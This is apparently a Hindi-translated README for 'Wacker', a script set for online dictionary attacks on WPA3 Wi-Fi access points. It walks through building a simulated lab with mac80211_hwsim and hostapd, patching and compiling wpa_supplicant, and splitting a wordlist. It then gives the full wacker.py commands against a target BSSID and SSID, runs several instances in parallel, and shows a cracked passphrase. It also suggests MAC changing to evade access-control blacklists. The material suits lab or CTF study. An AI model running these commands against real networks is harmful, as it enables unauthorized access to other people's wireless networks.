
एक WPA3 शब्दकोश क्रैकर
WPA3 एक्सेस पॉइंट के विरुद्ध ऑनलाइन डिक्शनरी हमला करने में सहायता के लिए स्क्रिप्ट का एक सेट। Wacker, wpa_supplicant नियंत्रण इंटरफ़ेस का उपयोग करके सप्लिकेंट डेमॉन के संचालन को नियंत्रित करता है और स्थिति जानकारी और घटना सूचनाएँ प्राप्त करता है, जो अंततः ब्रूट फोर्स प्रयासों के दौरान कनेक्शन प्रयासों को गति देने में मदद करता है।
परीक्षण के लिए WPA3 AP खोजने के बजाय, mac80211_hwsim (नीचे विवरण) का उपयोग करके या RF Hackers Sanctuary (scoreboard.rfhackers.com) द्वारा प्रदान किए गए VMs का उपयोग करके एक स्थानीय वातावरण स्थापित करने पर विचार करें।
अपने स्वयं के 802.11 रेडियो के सॉफ़्टवेयर सिम्युलेटर को स्थापित करने के लिए, सही mac80211_hwsim मॉड्यूल को कॉन्फ़िगर और लोड करें।
# modprobe mac80211_hwsim radios=4
# iwconfig
wlan0 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
wlan1 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
wlan2 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
wlan3 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
अपने WPA3 एक्सेस पॉइंट के रूप में नए इंटरफ़ेस में से एक चुनें और निम्नलिखित कॉन्फ़िग फ़ाइल का उपयोग करें।
# cat hostapd.conf
interface=wlan0
ssid=WCTF_18
driver=nl80211
hw_mode=g
channel=1
logger_syslog=-1
logger_syslog_level=3
wpa=2
wpa_passphrase=Aeromechanics
wpa_key_mgmt=SAE
rsn_pairwise=CCMP
ieee80211w=2
group_mgmt_cipher=AES-128-CMAC
और hostapd को इस प्रकार प्रारंभ करें
# hostapd -K -dd hostapd.conf
यदि आप अपने क्रैकिंग प्रयासों को निक्स की एक श्रृंखला में बाँटने का विचार रखते हैं, तो प्रदान की गई split.sh स्क्रिप्ट आपके लिए एक वर्डलिस्ट को विभाजित करेगी।
# ./split.sh 10 cyberpunk.words
50916 cyberpunk.words.aaa
50916 cyberpunk.words.aab
50916 cyberpunk.words.aac
50916 cyberpunk.words.aad
50916 cyberpunk.words.aae
50916 cyberpunk.words.aaf
50916 cyberpunk.words.aag
50916 cyberpunk.words.aah
50916 cyberpunk.words.aai
50907 cyberpunk.words.aaj
509151 total
हम अपना स्वयं का wpa_supplicant प्रदान कर रहे हैं ताकि यह सुनिश्चित हो सके कि कुछ कॉन्फ़िगरेशन सेट हैं, साथ ही स्रोत कोड के भीतर कुछ संशोधन होने चाहिए।
# apt-get install -y pkg-config libnl-3-dev gcc libssl-dev libnl-genl-3-dev
# cp defconfig wpa_supplicant-2.10/wpa_supplicant/.config
# git apply wpa_supplicant.patch
# cd wpa_supplicant-2.10/wpa_supplicant
# make -j4
# ls -al wpa_supplicant
-rwxr-xr-x 1 root root 13541416 May 31 16:30 wpa_supplicant
python3.6+ आवश्यक है
Wacker को airodump या kismet के पूरक उपकरण के रूप में देखा जाना चाहिए, जहाँ लक्ष्य चयन पहले से किया जाता है। Wacker जानबूझकर wpa_supplicant के साथ पृष्ठभूमि स्कैनिंग को अक्षम करता है ताकि प्रमाणीकरण प्रयासों को गति देने में मदद मिल सके।
wacker.py स्क्रिप्ट सभी भारी काम करने के लिए है और लक्ष्य के संबंध में कुछ विशिष्टताओं की आवश्यकता होती है।
# ./wacker.py --help
usage: wacker.py [-h] --wordlist WORDLIST --interface INTERFACE --bssid BSSID
--ssid SSID --freq FREQ [--start START_WORD] [--debug]
A WPA3 dictionary cracker. Must run as root!
optional arguments:
-h, --help show this help message and exit
--wordlist WORDLIST wordlist to use
--interface INTERFACE
interface to use
--bssid BSSID bssid of the target
--ssid SSID the ssid of the WPA3 AP
--freq FREQ frequency of the ap
--start START_WORD word to start with in the wordlist
--debug increase logging output
किसी भी भाग्य से... केवल एक इंस्टेंस का उपयोग करके हमला चलाना...
# ./wacker.py --wordlist cyberpunk.words --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan2 --freq 2412
Start time: 21 Aug 2020 07:40:11
Starting wpa_supplicant...
5795 / 509151 words (1.14%) : 79.41 words/sec : 0.020 hours lapsed : 1.76 hours to exhaust (21 Aug 2020 09:25:49)
Found the password: 'Aeromechanics'
Stop time: 21 Aug 2020 07:41:24
यदि आपके पास अतिरिक्त निक्स हैं तो wacker के कई इंस्टेंस चलाना आसान है। वर्डलिस्ट को विभाजित करना न भूलें।
# ./wacker.py --wordlist cyberpunk.words.aaa --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan1 --freq 2412
# ./wacker.py --wordlist cyberpunk.words.aab --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan2 --freq 2412
# ./wacker.py --wordlist cyberpunk.words.aac --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan3 --freq 2412
wacker काफी वर्बोज़ है। रुचि की फ़ाइलें /tmp/wacker/ के अंतर्गत पाई जाती हैं।
wacker लक्ष्य WPA3 AP द्वारा लागू किए गए ACLs को संभालता नहीं है। इसका मतलब है, वर्तमान कोड हमेशा एक ही MAC पते का उपयोग करता है। यदि लक्ष्य AP हमारे MAC पते को ब्लैकलिस्ट करता है तो स्क्रिप्ट वास्तविक प्रमाणीकरण विफलता और हमारे ब्लैकलिस्टेड MAC को अस्वीकार किए जाने के बीच अंतर नहीं करेगी। इसका मतलब होगा कि हम सही पासवर्ड को विफलता मानेंगे। एक तरीका हल करने का.... हमें धीमापन की कीमत पर स्रोत में macchanger जोड़ना होगा।
u631_3: WPA: AP group 0x10 network profile group 0x18; available group 0x10
u631_3: WPA: using GTK CCMP
u631_3: WPA: AP pairwise 0x10 network profile pairwise 0x18; available pairwise 0x10
u631_3: WPA: using PTK CCMP
u631_3: WPA: AP key_mgmt 0x400 network profile key_mgmt 0x400; available key_mgmt 0x400
u631_3: WPA: Failed to select authenticated key management type
u631_3: WPA: Failed to set WPA key management and encryption suites